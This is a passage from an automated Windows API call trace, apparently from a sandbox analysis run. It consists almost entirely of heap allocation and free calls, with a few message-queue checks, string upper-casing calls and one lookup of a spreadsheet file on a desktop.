hHeap=0x25c0000) returned 1 [0187.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0187.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0187.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0187.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0187.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0187.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0187.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0187.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16c8 [0187.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0187.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0187.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0187.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0187.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0187.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0187.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0187.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0187.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0187.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0187.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0187.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0187.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0187.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0187.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0187.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0187.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0187.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0187.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0187.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0187.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0187.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0187.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0187.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0187.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0187.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0187.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0187.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0187.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0187.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0187.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0187.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0187.674] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0187.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0187.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0187.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0187.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0187.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0187.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0187.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0187.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.674] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0187.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0187.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0187.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0187.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0187.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0187.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0187.675] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0187.675] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0187.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0187.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0187.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0187.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0187.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0187.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0187.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0187.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0187.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0187.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0187.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0187.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0187.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0187.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0187.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0187.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0187.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0187.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0187.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0187.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0187.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0187.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0187.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0187.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0187.677] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0187.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0187.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0187.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0187.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0187.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0187.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0187.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0187.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0187.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0187.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0187.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0187.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0187.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0187.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0187.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0187.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0187.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0187.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0187.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0187.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0187.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0187.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0187.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0187.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0187.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0187.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0187.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0187.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0187.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0187.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0187.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0187.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0187.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0187.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0187.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0187.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0187.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0187.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0187.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0187.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0187.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0187.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0187.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.681] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0187.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0187.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0187.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0187.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0187.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0187.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0187.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0187.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0187.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0187.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0187.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0187.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0187.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0187.682] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0187.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0187.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0187.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0187.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0187.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0187.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0187.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0187.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0187.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0187.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0187.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0187.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0187.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0187.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0187.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0187.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0187.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0187.684] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/lorGIZR7_Ai6fNrX6f.xlsx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b13d2b0, ftCreationTime.dwHighDateTime=0x1d4c6a9, ftLastAccessTime.dwLowDateTime=0xacf087c0, ftLastAccessTime.dwHighDateTime=0x1d4d361, ftLastWriteTime.dwLowDateTime=0xacf087c0, ftLastWriteTime.dwHighDateTime=0x1d4d361, nFileSizeHigh=0x0, nFileSizeLow=0x58b8, dwReserved0=0xf7d0006, dwReserved1=0xec43, cFileName="lorGIZR7_Ai6fNrX6f.xlsx", cAlternateFileName="LORGIZ~1.XLS")) returned 0xaa5660 [0187.684] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0187.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0187.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0187.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0187.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0187.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.685] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0187.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0187.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0187.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0187.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0187.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0187.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0187.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0187.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0187.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0187.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0187.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0187.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0187.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0187.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0187.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0187.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.689] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0187.690] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0187.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0187.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0187.690] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0187.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0187.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0187.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0187.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0187.691] RtlAllocateHeap 